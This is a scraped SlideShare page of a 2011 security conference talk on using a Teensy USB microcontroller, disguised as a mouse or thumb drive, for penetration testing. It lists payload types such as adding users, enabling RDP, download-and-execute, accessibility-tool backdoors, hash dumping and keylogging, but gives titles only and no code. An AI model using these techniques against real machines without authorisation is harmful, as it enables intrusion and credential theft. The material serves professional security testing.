MERE PAAS TEENSY HAIORCOMPROMISING A HIGHLY SECUREENVIRONMENT PART 2      Nikhil Mittal (SamratAshok)
ABOUT ME SamratAshok Twitter - @nikhil_mitt Penetration Tester with PwC India I am interested in Offensive Information...
OVERVIEW Why the Title? Current State of Pentesting Questions being raised to us The answer to the questions What’s d...
WHY THE TITLE?   What I Told to the ClubHack team:       I talked about compromising a highly secure        environment ...
A TYPICAL PEN TEST SCENARIO A client engagement comes with IP addresses. We need to complete the assignment in very  res...
CURRENT STATE OF PENTESTING  Vuln              Exploit         Report  Scan
 This is a best case scenario. Only lucky ones find that. Generally legacy Enterprise Applications or  Business Critica...
SOME OF US DO IT BETTER Enum      Scan      Exploit   Report
SOME OF US DO IT EVEN BETTEREnum                          Post   +     Scan   Exploit          Report                     ...
WHY DO WE NEED TO EXPLOIT? To gain access to the systems. This shows the real threat to clients that we can  actually ma...
WHAT DO WE EXPLOIT?   Memory Corruption bugs.       Server side       Client Side Humans Mis-configurations Design P...
QUESTIONS BEING RAISED TO US   Many times we get some vulnerabilities but can’t    exploit.       No public exploits ava...
QUESTIONS BEING RAISED TO US Hardened Systems Patches in place Countermeasures blocking scans and exploits Security in...
QUESTIONS BEING RAISED TO US Just a bad day. Exploit completed but no session was generated :P                          ...
ALTERNATIVES Open file shares. Sticky slips. Social Engineering attacks. Man In The Middle (many types) SMB Relay <A...
THE ANSWER TO THE QUESTIONSTEENSY A USB Micro-controller device. We will use Teensy ++ which is a newer version of  Teen...
USING TEENSY Find an unattended system and insert the teensy  device in USB port. Fool your victim by disguising it as a...
WHAT’S DONE Arduino-Based attack vector in Social Engineering  Toolkit by David Kennedy Contains some really awesome pay...
WHAT WE WILL DO Teensy can be used for much more than popping  shells. It can be used to perform pre and post exploitati...
DESCRIPTION OF PAYLOADS More for Windows as desktops are generally based  on Windows. Payloads vary from one line comman...
DEMO
WINDOWS USER ADD
THANK YOU
DEFAULT DNS
EDIT HOSTS FILE
ENABLE RDP
BUT What if even Teensy doesn’t work? With other  options not working already? If USB ports are ripped off? Would it be...
ENABLE TELNET
FORCEFUL BROWSING
DOWNLOAD AND EXECUTE
SETHC AND UTILMAN BACKDOOR
UNINSTALL APPLICATION
REGISTRY EXPORT
TWEET
HASHDUMP
CODE EXECUTION
KEYLOGGING
LIMITATIONS Limited storage in Teensy. Resolved if you attach a  SD card with Teensy. Inability to “read” from the syste...
FUTURE Kautilya Improvement in current payloads. New payloads for non-traditional shells. Dropping executables using a...
CONCLUSION If used wisely Teensy can be used as a complete  penetration testing device though with its own  limitations....
THANK YOU Questions? Insults? Feedback?
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
Upcoming SlideShare
Loading in...5
×

Mere Paas Teensy Hai (Nikhil Mittal)

1,483

Published on

ClubHack 2011 Hacking and Security Conference.
Talk - Mere Pass Teensy Hai
Speaker - Nikhil MIttal

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,483
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
37
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Mere Paas Teensy Hai (Nikhil Mittal)

  1. 1. MERE PAAS TEENSY HAIORCOMPROMISING A HIGHLY SECUREENVIRONMENT PART 2 Nikhil Mittal (SamratAshok)
  2. 2. ABOUT ME SamratAshok Twitter - @nikhil_mitt Penetration Tester with PwC India I am interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. Creator of Kautilya and Maareech Previous Talks  Ultimate Pen Testing: Compromising a highly secure environment Clubhack’10  Here are your Keystrokes Hackfest’11 Upcoming Talks  Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11
  3. 3. OVERVIEW Why the Title? Current State of Pentesting Questions being raised to us The answer to the questions What’s done What we will do Limitations Future Conclusion
  4. 4. WHY THE TITLE? What I Told to the ClubHack team:  I talked about compromising a highly secure environment last year, let’s continue with the pwnage!!  Thanks to the team for buying that and allowing me to speak. The real reason:
  5. 5. A TYPICAL PEN TEST SCENARIO A client engagement comes with IP addresses. We need to complete the assignment in very restrictive time frame. Pressure is on us to deliver a “good” report with some high severity findings. (That “High” return inside a red colored box)
  6. 6. CURRENT STATE OF PENTESTING Vuln Exploit Report Scan
  7. 7.  This is a best case scenario. Only lucky ones find that. Generally legacy Enterprise Applications or Business Critical applications are not upgraded. There is almost no fun doing it that way.
  8. 8. SOME OF US DO IT BETTER Enum Scan Exploit Report
  9. 9. SOME OF US DO IT EVEN BETTEREnum Post + Scan Exploit Report Exp Intel
  10. 10. WHY DO WE NEED TO EXPLOIT? To gain access to the systems. This shows the real threat to clients that we can actually make an impact on their business. No more “so-what”  We can create reports with “High” Severity findings. <Audience> <Audience>
  11. 11. WHAT DO WE EXPLOIT? Memory Corruption bugs.  Server side  Client Side Humans Mis-configurations Design Problems <Audience> <Audience>
  12. 12. QUESTIONS BEING RAISED TO US Many times we get some vulnerabilities but can’t exploit.  No public exploits available.  Not allowed on the system.  Countermeasure blocking it.  Exploit completed but no session was generated :P Kya hai tumhare paas?
  13. 13. QUESTIONS BEING RAISED TO US Hardened Systems Patches in place Countermeasures blocking scans and exploits Security incident monitoring and blocking Kya hai tumhare paas?
  14. 14. QUESTIONS BEING RAISED TO US Just a bad day. Exploit completed but no session was generated :P Kya hai tumhare paas?
  15. 15. ALTERNATIVES Open file shares. Sticky slips. Social Engineering attacks. Man In The Middle (many types) SMB Relay <Audience> <Audience>
  16. 16. THE ANSWER TO THE QUESTIONSTEENSY A USB Micro-controller device. We will use Teensy ++ which is a newer version of Teensy. Available for $24 from pjrc.com Mere paas Teensy hai
  17. 17. USING TEENSY Find an unattended system and insert the teensy device in USB port. Fool your victim by disguising it as a mouse, USB toy, Thumb drive etc. Generally Teensy needs just a minute to complete the job. You can program it according to your needs. Undetected and unblocked, Teensy works great for popping shells.
  18. 18. WHAT’S DONE Arduino-Based attack vector in Social Engineering Toolkit by David Kennedy Contains some really awesome payloads. Almost all payloads are for popping shells.
  19. 19. WHAT WE WILL DO Teensy can be used for much more than popping shells. It can be used to perform pre and post exploitation. We will have a detailed look at some of these payloads and will understand how to create payloads as per our needs.
  20. 20. DESCRIPTION OF PAYLOADS More for Windows as desktops are generally based on Windows. Payloads vary from one line commands to powerful scripts. If you know powershell scripting, payloads will make more sense and will be easier to customize.
  21. 21. DEMO
  22. 22. WINDOWS USER ADD
  23. 23. THANK YOU
  24. 24. DEFAULT DNS
  25. 25. EDIT HOSTS FILE
  26. 26. ENABLE RDP
  27. 27. BUT What if even Teensy doesn’t work? With other options not working already? If USB ports are ripped off? Would it be impossible to pwn such environment?
  28. 28. ENABLE TELNET
  29. 29. FORCEFUL BROWSING
  30. 30. DOWNLOAD AND EXECUTE
  31. 31. SETHC AND UTILMAN BACKDOOR
  32. 32. UNINSTALL APPLICATION
  33. 33. REGISTRY EXPORT
  34. 34. TWEET
  35. 35. HASHDUMP
  36. 36. CODE EXECUTION
  37. 37. KEYLOGGING
  38. 38. LIMITATIONS Limited storage in Teensy. Resolved if you attach a SD card with Teensy. Inability to “read” from the system. You have to assume the responses of victim OS and there is only one way traffic.
  39. 39. FUTURE Kautilya Improvement in current payloads. New payloads for non-traditional shells. Dropping executables using additional storage (already done).
  40. 40. CONCLUSION If used wisely Teensy can be used as a complete penetration testing device though with its own limitations. It’s a cheap device so use it. Please use Kautilya and give feedback after it is released. Mere paas Teensy hai
  41. 41. THANK YOU Questions? Insults? Feedback?
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×